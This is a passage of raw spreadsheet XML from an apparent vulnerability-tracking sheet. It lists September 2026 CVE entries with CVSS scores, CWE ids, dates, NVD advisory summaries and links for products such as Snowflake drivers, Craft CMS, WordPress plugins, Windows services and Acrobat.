with read access to the log destination, whether the local filesystem, a log aggregation service, or a CI/CD artifact store, could obtain credentials and decryption keys that, if still valid at the time of access, could be used to authenticate to the corresponding Snowflake account or cloud-storage object. Successful exploitation requires read access to the log destination, and impact is bounded by credential lifetime and object scope. The fix is available in Snowflake Connector for Python v4.7.3, Snowflake Go Driver v2.2.0, Snowflake JDBC Driver v4.3.4 (including the snowflake-jdbc-fips and snowflake-jdbc-thin), Snowflake Node.js Driver v3.3.0, Snowflake PHP PDO Driver v4.2.0, and Snowflake ODBC Driver v3.20.0. Users must manually upgrade and should securely delete previously generated diagnostic logs containing sensitive information where retention is not required.</t></is></c><c r="T1164" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86597</t></is></c></row><row r="1165"><c r="A1165" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1165" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1165" s="5" t="inlineStr"><is><t>CVE-2026-86726</t></is></c><c r="D1165" s="5" t="n"><v>6.5</v></c><c r="E1165" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1165" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1165" s="5" t="inlineStr" /><c r="H1165" s="5" t="n"><v>0.003</v></c><c r="I1165" s="5" t="inlineStr" /><c r="J1165" s="5" t="inlineStr" /><c r="K1165" s="5" t="inlineStr" /><c r="L1165" s="5" t="inlineStr" /><c r="M1165" s="5" t="inlineStr" /><c r="N1165" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1165" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1165" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1165" s="5" t="inlineStr" /><c r="R1165" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S1165" s="5" t="inlineStr"><is><t>AVideo through 29.0 contains an information disclosure vulnerability in restreamsActive.json.php that allows authenticated streamers to enumerate source stream keys and identities of all other streamers' active restreams. The endpoint fails to filter results by user ownership, exposing sensitive transmission credentials and streamer identity across all accounts to any user with streaming capability.</t></is></c><c r="T1165" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86726</t></is></c></row><row r="1166"><c r="A1166" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1166" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1166" s="5" t="inlineStr"><is><t>CVE-2026-86731</t></is></c><c r="D1166" s="5" t="n"><v>6.5</v></c><c r="E1166" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1166" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1166" s="5" t="inlineStr" /><c r="H1166" s="5" t="n"><v>0.002</v></c><c r="I1166" s="5" t="inlineStr" /><c r="J1166" s="5" t="inlineStr" /><c r="K1166" s="5" t="inlineStr" /><c r="L1166" s="5" t="inlineStr" /><c r="M1166" s="5" t="inlineStr" /><c r="N1166" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1166" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1166" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1166" s="5" t="inlineStr" /><c r="R1166" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1166" s="5" t="inlineStr"><is><t>Craft CMS versions 5.0.0-RC1 through 5.10.11 are missing an admin-target guard in UsersController::actionActivateUser (the users/activate-user action). While the action requires the administrateUsers permission, it does not call requireAdmin() when the targeted user is an administrator, unlike the mirror action actionDeactivateUser. As a result, an authenticated control panel user who is not an administrator but holds the administrateUsers permission can activate a pending or deliberately deactivated administrator account, which can lead to permission escalation when combined with resetting that account's password. The issue is fixed in Craft CMS 5.10.12.</t></is></c><c r="T1166" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86731</t></is></c></row><row r="1167"><c r="A1167" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1167" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1167" s="5" t="inlineStr"><is><t>CVE-2026-12230</t></is></c><c r="D1167" s="5" t="n"><v>6.4</v></c><c r="E1167" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1167" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1167" s="5" t="inlineStr" /><c r="H1167" s="5" t="n"><v>0.002</v></c><c r="I1167" s="5" t="inlineStr" /><c r="J1167" s="5" t="inlineStr" /><c r="K1167" s="5" t="inlineStr" /><c r="L1167" s="5" t="inlineStr" /><c r="M1167" s="5" t="inlineStr" /><c r="N1167" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1167" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1167" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1167" s="5" t="inlineStr" /><c r="R1167" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1167" s="5" t="inlineStr"><is><t>The LearnPress – WordPress LMS Plugin for Create and Sell Online Courses plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'layout_custom_css' parameter in all versions up to, and including, 4.3.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t></is></c><c r="T1167" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12230</t></is></c></row><row r="1168"><c r="A1168" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1168" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1168" s="5" t="inlineStr"><is><t>CVE-2026-33388</t></is></c><c r="D1168" s="5" t="n"><v>6.4</v></c><c r="E1168" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1168" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1168" s="5" t="inlineStr" /><c r="H1168" s="5" t="n"><v>0.003</v></c><c r="I1168" s="5" t="inlineStr" /><c r="J1168" s="5" t="inlineStr" /><c r="K1168" s="5" t="inlineStr" /><c r="L1168" s="5" t="inlineStr" /><c r="M1168" s="5" t="inlineStr" /><c r="N1168" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1168" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1168" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1168" s="5" t="inlineStr" /><c r="R1168" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1168" s="5" t="inlineStr"><is><t>An access control vulnerability was discovered in the Credentials Manager functionality due to insufficient validation of user privileges. A remote authenticated user with limited privileges can view a limited subset of the available entries in the Credentials Manager. The actual credential values are not directly visible, but the user can delete entries or edit their properties. An attacker who deletes or edits an entry can disrupt authentication for dependent devices, and one who manipulates an entry's configuration may be able to indirectly obtain the credentials.</t></is></c><c r="T1168" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33388</t></is></c></row><row r="1169"><c r="A1169" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1169" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1169" s="5" t="inlineStr"><is><t>CVE-2026-69874</t></is></c><c r="D1169" s="5" t="n"><v>6.4</v></c><c r="E1169" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1169" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1169" s="5" t="inlineStr" /><c r="H1169" s="5" t="n"><v>0.003</v></c><c r="I1169" s="5" t="inlineStr" /><c r="J1169" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1169"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169" s="5" t="inlineStr" /><c r="M1169" s="5" t="inlineStr" /><c r="N1169" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1169" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1169" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1169" s="5" t="inlineStr" /><c r="R1169" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1169" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows ALPC allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1169" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69874</t></is></c></row><row r="1170"><c r="A1170" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1170" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1170" s="5" t="inlineStr"><is><t>CVE-2026-69878</t></is></c><c r="D1170" s="5" t="n"><v>6.4</v></c><c r="E1170" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1170" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1170" s="5" t="inlineStr" /><c r="H1170" s="5" t="n"><v>0.003</v></c><c r="I1170" s="5" t="inlineStr" /><c r="J1170" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1170" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1170" s="5" t="inlineStr" /><c r="M1170" s="5" t="inlineStr" /><c r="N1170" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1170" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1170" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1170" s="5" t="inlineStr" /><c r="R1170" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1170" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code locally.</t></is></c><c r="T1170" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69878</t></is></c></row><row r="1171"><c r="A1171" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1171" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1171" s="5" t="inlineStr"><is><t>CVE-2026-70582</t></is></c><c r="D1171" s="5" t="n"><v>6.4</v></c><c r="E1171" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1171" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1171" s="5" t="inlineStr" /><c r="H1171" s="5" t="n"><v>0.002</v></c><c r="I1171" s="5" t="inlineStr" /><c r="J1171" s="5" t="inlineStr" /><c r="K1171" s="5" t="inlineStr" /><c r="L1171" s="5" t="inlineStr" /><c r="M1171" s="5" t="inlineStr" /><c r="N1171" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1171" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1171" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1171" s="5" t="inlineStr" /><c r="R1171" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S1171" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1171" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70582</t></is></c></row><row r="1172"><c r="A1172" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1172" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1172" s="5" t="inlineStr"><is><t>CVE-2026-71338</t></is></c><c r="D1172" s="5" t="n"><v>6.4</v></c><c r="E1172" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1172" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1172" s="5" t="inlineStr" /><c r="H1172" s="5" t="n"><v>0.003</v></c><c r="I1172" s="5" t="inlineStr" /><c r="J1172" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1172" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1172" s="5" t="inlineStr" /><c r="M1172" s="5" t="inlineStr" /><c r="N1172" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1172" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1172" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1172" s="5" t="inlineStr" /><c r="R1172" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S1172" s="5" t="inlineStr"><is><t>Double free in Windows Failover Cluster allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1172" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71338</t></is></c></row><row r="1173"><c r="A1173" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1173" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1173" s="5" t="inlineStr"><is><t>CVE-2026-72947</t></is></c><c r="D1173" s="5" t="n"><v>6.4</v></c><c r="E1173" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1173" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1173" s="5" t="inlineStr" /><c r="H1173" s="5" t="n"><v>0.003</v></c><c r="I1173" s="5" t="inlineStr" /><c r="J1173" s="5" t="inlineStr" /><c r="K1173" s="5" t="inlineStr" /><c r="L1173" s="5" t="inlineStr" /><c r="M1173" s="5" t="inlineStr" /><c r="N1173" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1173" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1173" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1173" s="5" t="inlineStr" /><c r="R1173" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1173" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows File History Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1173" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72947</t></is></c></row><row r="1174"><c r="A1174" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1174" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1174" s="5" t="inlineStr"><is><t>CVE-2026-76931</t></is></c><c r="D1174" s="5" t="n"><v>6.4</v></c><c r="E1174" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1174" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1174" s="5" t="inlineStr" /><c r="H1174" s="5" t="n"><v>0.002</v></c><c r="I1174" s="5" t="inlineStr" /><c r="J1174" s="5" t="inlineStr" /><c r="K1174" s="5" t="inlineStr" /><c r="L1174" s="5" t="inlineStr" /><c r="M1174" s="5" t="inlineStr" /><c r="N1174" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1174" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1174" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1174" s="5" t="inlineStr" /><c r="R1174" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1174" s="5" t="inlineStr"><is><t>The Zephyr Project Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘message’ parameter in all versions up to, and including, 3.3.205 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Custom-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability can only be exploited when the 'Directly link to project' plugin setting is disabled.</t></is></c><c r="T1174" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76931</t></is></c></row><row r="1175"><c r="A1175" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1175" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1175" s="5" t="inlineStr"><is><t>CVE-2026-77887</t></is></c><c r="D1175" s="5" t="n"><v>6.4</v></c><c r="E1175" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1175" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1175" s="5" t="inlineStr" /><c r="H1175" s="5" t="n"><v>0.002</v></c><c r="I1175" s="5" t="inlineStr" /><c r="J1175" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1175" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1175" s="5" t="inlineStr" /><c r="M1175" s="5" t="inlineStr" /><c r="N1175" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1175" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1175" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1175" s="5" t="inlineStr" /><c r="R1175" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1175" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t></is></c><c r="T1175" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77887</t></is></c></row><row r="1176"><c r="A1176" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1176" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1176" s="5" t="inlineStr"><is><t>CVE-2026-77891</t></is></c><c r="D1176" s="5" t="n"><v>6.4</v></c><c r="E1176" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1176" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1176" s="5" t="inlineStr" /><c r="H1176" s="5" t="n"><v>0.002</v></c><c r="I1176" s="5" t="inlineStr" /><c r="J1176" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1176" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1176" s="5" t="inlineStr" /><c r="M1176" s="5" t="inlineStr" /><c r="N1176" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1176" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1176" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1176" s="5" t="inlineStr" /><c r="R1176" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1176" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t></is></c><c r="T1176" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77891</t></is></c></row><row r="1177"><c r="A1177" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1177" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1177" s="5" t="inlineStr"><is><t>CVE-2026-53639</t></is></c><c r="D1177" s="5" t="n"><v>6.3</v></c><c r="E1177" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1177" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1177" s="5" t="inlineStr" /><c r="H1177" s="5" t="n"><v>0.005</v></c><c r="I1177" s="5" t="inlineStr" /><c r="J1177" s="5" t="inlineStr" /><c r="K1177" s="5" t="inlineStr" /><c r="L1177" s="5" t="inlineStr" /><c r="M1177" s="5" t="inlineStr" /><c r="N1177" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1177" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1177" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1177" s="5" t="inlineStr" /><c r="R1177" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1177" s="5" t="inlineStr"><is><t>Sylius is an Open Source eCommerce Framework on Symfony. Starting in version 2.0.0 and prior to version 2.0.18, 2.1.15, and 2.2.6, the `GET /api/v2/shop/payment-requests/{hash}` and `PUT /api/v2/shop/payment-requests/{hash}` endpoints look up the payment request solely by the hash from the URL. No ownership check is performed against the authenticated customer or the underlying order. An attacker who obtains a payment request hash can read the payment request and, through the `payment` IRI in the response, recover the underlying order's `tokenValue` (which itself grants access to the full order, items, addresses, customer email, totals); and/or update the payment request payload (e.g. `target_path`, `after_path`). These fields are used by the front-end controller to redirect the user after the payment, so an attacker can flip them to an attacker-controlled URL and intercept the buyer. The hash is a UUID, so it has to be obtained out-of-band (logs, shared links, referrer headers, a co-located client), but once it is known no other credential is required, neither authentication nor knowledge of the order token. The creation endpoint `POST /api/v2/shop/orders/{tokenValue}/payment-requests` shares the same flaw: it resolves the target order solely from the `tokenValue` in the URL without verifying that the caller owns the order. The issue is fixed in versions 2.0.18, 2.1.15, and 2.2.6. As a workaround, add a query extension that filters the `GET` operation; decorate the `PUT` state provider, guard the `POST` creation endpoint with a command-bus middleware, and wire the services.</t></is></c><c r="T1177" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53639</t></is></c></row><row r="1178"><c r="A1178" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1178" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1178" s="5" t="inlineStr"><is><t>CVE-2026-81824</t></is></c><c r="D1178" s="5" t="n"><v>6.3</v></c><c r="E1178" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1178" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G1178" s="5" t="inlineStr" /><c r="H1178" s="5" t="n"><v>0.002</v></c><c r="I1178" s="5" t="inlineStr" /><c r="J1178" s="5" t="inlineStr" /><c r="K1178" s="5" t="inlineStr" /><c r="L1178" s="5" t="inlineStr" /><c r="M1178" s="5" t="inlineStr" /><c r="N1178" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1178" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1178" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1178" s="5" t="inlineStr" /><c r="R1178" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1178" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow a miscreant to run arbitrary JavaScript code in a browser session of a PIMBoards user who was socially engineered to click on a malicious link.</t></is></c><c r="T1178" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81824</t></is></c></row><row r="1179"><c r="A1179" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1179" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1179" s="5" t="inlineStr"><is><t>CVE-2026-81904</t></is></c><c r="D1179" s="5" t="n"><v>6.3</v></c><c r="E1179" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1179" s="5" t="inlineStr"><is><t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t></is></c><c r="G1179" s="5" t="inlineStr" /><c r="H1179" s="5" t="n"><v>0.003</v></c><c r="I1179" s="5" t="inlineStr" /><c r="J1179" s="5" t="inlineStr" /><c r="K1179" s="5" t="inlineStr" /><c r="L1179" s="5" t="inlineStr" /><c r="M1179" s="5" t="inlineStr" /><c r="N1179" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1179" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1179" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1179" s="5" t="inlineStr" /><c r="R1179" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1179" s="5" t="inlineStr"><is><t>Concrete CMS below 9.5.3 registered view assets for every sub-block of a Stack, Container, or layout area without checking whether the requesting user could view that sub-block. An unauthenticated visitor could recover configuration values emitted by a restricted sub-block's asset registration — such as a site's configured Google Maps API key — from any public page embedding an affected Stack, Container, or layout area, despite the block-level permission restriction. Any sub-block type whose asset or header hooks output configuration values is affected.  The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting.</t></is></c><c r="T1179" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81904</t></is></c></row><row r="1180"><c r="A1180" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1180" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1180" s="5" t="inlineStr"><is><t>CVE-2026-81994</t></is></c><c r="D1180" s="5" t="n"><v>6.3</v></c><c r="E1180" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1180" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1180" s="5" t="inlineStr" /><c r="H1180" s="5" t="n"><v>0.003</v></c><c r="I1180" s="5" t="inlineStr" /><c r="J1180" s="5" t="inlineStr" /><c r="K1180" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1180" s="5" t="inlineStr" /><c r="M1180" s="5" t="inlineStr" /><c r="N1180" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1180" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1180" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1180" s="5" t="inlineStr" /><c r="R1180" s="5" t="inlineStr"><is><t>CWE-1321</t></is></c><c r="S1180" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t></is></c><c r="T1180" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81994</t></is></c></row><row r="1181"><c r="A1181" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1181" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1181" s="5" t="inlineStr"><is><t>CVE-2026-81997</t></is></c><c r="D1181" s="5" t="n"><v>6.3</v></c><c r="E1181" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1181" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1181" s="5" t="inlineStr" /><c r="H1181" s="5" t="n"><v>0.002</v></c><c r="I1181" s="5" t="inlineStr" /><c r="J1181" s="5" t="inlineStr" /><c r="K1181" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1181" s="5" t="inlineStr" /><c r="M1181" s="5" t="inlineStr" /><c r="N1181" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1181" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1181" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1181" s="5" t="inlineStr" /><c r="R1181" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1181" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t></is></c><c r="T1181" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81997</t></is></c></row><row r="1182"><c r="A1182" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1182" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1182" s="5" t="inlineStr"><is><t>CVE-2026-84942</t></is></c><c r="D1182" s="5" t="n"><v>6.3</v></c><c r="E1182" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1182" s="5" t="inlineStr"><is><t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t></is></c><c r="G1182" s="5" t="inlineStr" /><c r="H1182" s="5" t="n"><v>0.003</v></c><c r="I1182" s="5" t="inlineStr" /><c r="J1182" s="5" t="inlineStr" /><c r="K1182" s="5" t="inlineStr" /><c r="L1182" s="5" t="inlineStr" /><c r="M1182" s="5" t="inlineStr" /><c r="N1182" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1182" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1182" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1182" s="5" t="inlineStr" /><c r="R1182" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1182" s="5" t="inlineStr"><is><t>Improper input validation in the Vega expression function implementation in OpenSearch Dashboards allows a remote authenticated actor with dashboard write permissions to execute arbitrary JavaScript in the context of other users' browser sessions by saving a crafted Vega visualization. The checkForFunctionProperty validation routine failed to recurse into arrays of objects, allowing a function property nested inside an array to bypass validation.</t></is></c><c r="T1182" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84942</t></is></c></row><row r="1183"><c r="A1183" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1183" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1183" s="5" t="inlineStr"><is><t>CVE-2026-86590</t></is></c><c r="D1183" s="5" t="n"><v>6.3</v></c><c r="E1183" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c 